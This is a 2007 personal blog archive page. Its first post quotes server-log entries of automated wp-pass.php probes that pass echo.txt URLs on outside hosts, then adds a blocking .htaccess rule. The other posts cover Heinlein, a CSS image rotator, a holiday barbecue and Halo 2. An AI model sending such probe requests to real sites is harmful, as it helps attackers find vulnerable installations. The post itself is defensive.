Mostly about my amusement

Year: 2007 (page 11 of 18)

.htaccess to prevent wp-pass.php redirects

I was checking out my server logs (gripping reading, could not put it down) when I saw these two entries:

208.78.98.108 - - [09/Jul/2007:20:28:07 -0400] "GET /wp-pass.php?_wp_http_referer=http://topnlpsites.com/images/gif/echo.txt? HTTP/1.1" 403 860 "-" "libwww-perl/5.803"
81.169.188.151 - - [09/Jul/2007:20:54:39 -0400] "GET /wp-pass.php?_wp_http_referer=http://doublezer0.free.fr/echo.txt? HTTP/1.1" 403 1032 "-" "libwww-perl/5.69"

File wp-pass.php? Where’d that come from?

See the BUGTRAQ explanation here. By passing arguments to wp-pass.php, the wp-pass.php file will send the requesting browser to the URL that wp_http_refferer points to. By using a simple script the WordPress installation is easily verified as susceptible.

The bad buy sends out a SPAM or bogus link that points to a WordPress installation and that WordPress blog redirects the request to where ever the attacker wants. This is not earth shattering but really annoying.

Luckily Apache’s .htaccess is our friend. In my blog root at the end of my .htaccess file I added the following two lines:

RewriteCond %{REQUEST_URI} ".*wp-pass.php"
RewriteRule .* - [F]

I do not have any password protected posts so I don’t use that file (which is all I gather it is for…) and after implementing this my blog continues to work fine. Any requests that match that rewrite conditions gets a return value of 403: Forbiden.

This is to be fixed in WordPress 2.2.2 says the posting. The BUGTRAQ posting also mentions wp-includes/pluggable.php, wp-includes/functions.php maybe vulnerable due to the use of problematic code.

New Old Russia

When I was in high-school I read lots of Robert A. Heinlein. The stories were very “good guy versus bad guys”, with the help of a lady who was much smarter that the good guy and knew the real score.

Great stuff and a collection of his was updated in 1980 to include new material and updates. That collection was called “Expanded Universe“. It’s a great look into what people thought in the 40’s through the 60’s. R.A.H. was a great American patriot, never trusted Communists, and would work hard to put the science into science fiction.

Buy the book or go to the library. Read the short story “Pravda” Means “Truth”. Now go to the New York Times online article titled “Youth Groups Created by Kremlin Serve Putin’s Cause“. Here is an excerpt from the begining of the article.

“Tell me, what achievements of Putin’s policy can you name?” she asked, referring to Russia’s president since 2000, Vladimir V. Putin.

“Well, it’s the stabilization in the economy,” the girl answered. “Pensions were raised.”

“And what’s in Chechnya?” Ms. Kuliyeva asked, probing her knowledge of a separatist conflict that has killed tens of thousands and, although largely won by Russia’s federal forces and Chechen loyalists, continues.

“In Chechnya, it’s that it is considered a part of Russia,” the girl responded.

“Is this war still going on there?”

“No, everything is quiet.”

It’s a scary read. In the short story of the Heinlein’s trip to Russia “Pravda” Means “Truth” they visit a class and see some school kids with their guide. This is the text I typed from the book (page 414 on my copy).

Our guide translated nothing so, superficially, it was the sort of beguiling performance one sees in any American kindergarten.

However, my wife understands Russian:

The poem recounted the life of Lenin.

The prose recitation concerned the Seven-Year Plan.

The group singing was about how “we must protect our Revolution.”

These tots were no older than six.

That is how it is done. Starting at the cradle, never let them hear anything but the official version. Thus “pravda” becomes “truth” to the Russian children.

The Heinlein’s trip was in 1960 when the U-2 spy plane made an unscheduled landing. At that time Khrushchev was in charge. Apparently Putin and his pals know full well that the old tricks really do work best

I’m not sure if the tag Just Stupid should really be replaced with Just Scary.

XHTML and image rotate for the header

I’ve had some free time so I’ve added so I went through all my posts (153!) and made sure they validate as XHTML strict. I’ve also played with this theme and added the image rotator for the header.

Using Matt’s rotate.php script, I created a directory called and dumped some images in there.  The images were lifted from Stefan’s Flickr page.  His pictures are great and I was using one of his images as a banner already.

In my CSS file I replaced the

#header {
background: url(img/bus.jpg) no-repeat bottom;

with

#header {
background: url(img/rotate.php) no-repeat bottom;

Per the CSS for my header the files should be 700×175; which I forgot and created 700×200 images. No big deal the CSS fixes the images to fit.

The fun part was getting the caching to work so I could see the files and how they look. Internet Explorer and Firefox cache the page to make the whole experience is faster. But that also means that when I reloaded the page the banner would not necessarily change.

Using Google I found that adding the following right below the <head> statement in my header.php would get Internet Explorer and Firefox to reload the whole page with a new banner (most of the time).

<meta http-equiv=”Expires” content=”Tue, 01 Jan 1980 1:00:00 GMT” />
<meta http-equiv=”Pragma” content=”no-cache” />

I turned it off after my curiosity was satisfied. Caching is your friend and should be respected.

Happy 4th of July

4th of JulyFor the 4th, the family went over to Stefan’s place for a BBQ. It was raining but everyone had a good time. We moved the table into the garage and hung out till it go dark.

The garage had no lights so Janny got us candles. A good time was definitely had by all.

Living in Long Island for a couple of years now has spoiled me for Queens. On the next block they were shooting off fireworks and had some guys informally closing the street. I expected someone to call the cops (I’m paranoid that way) but I guess everyone liked it so it was all cool.

The drive back was fun. Since it was only the four of us I insisted we take the MINI. That’s always a fun car to drive but gets a little scary when it starts raining hard. Because of the rain the barge carrying the Jones Beach fireworks was not able to get there and they had to cancel.

Too bad, a lot of people must have been disappointed.

Completed Halo 2 on Vista

Halo 2 on Vista banner from microsoft.com

That was anticlimactic.

My saved games came back and I was farther along than I thought. After a couple of “boss” battles I completed the game. I actually had to check the Wikipedia page to see if there was something I missed.

It was definitely an “okay” game but nothing to get excited about. After playing Call of Duty 2 (and CoD 3 on the PS3) I have a feeling of “that’s it?”

When Halo 3 comes out I’ll probably get it for the Xbox 360, but Bungie and Microsoft better get some more excitement into the game.

Halo 2 on Vista problems

Delta HaloMy installation of Halo 2 on Vista is not working. I get to the part where the Arbiter gets pushed off the ledge when Keyes gets captured and he loses the icon.

The game complains about needing the DVD, I insert it and I have to repeat the whole level. Twice. I’m taking a break but that is really a pain in the ass. I may re-install it and see if that fixes the problem.

So far the game is “okay”.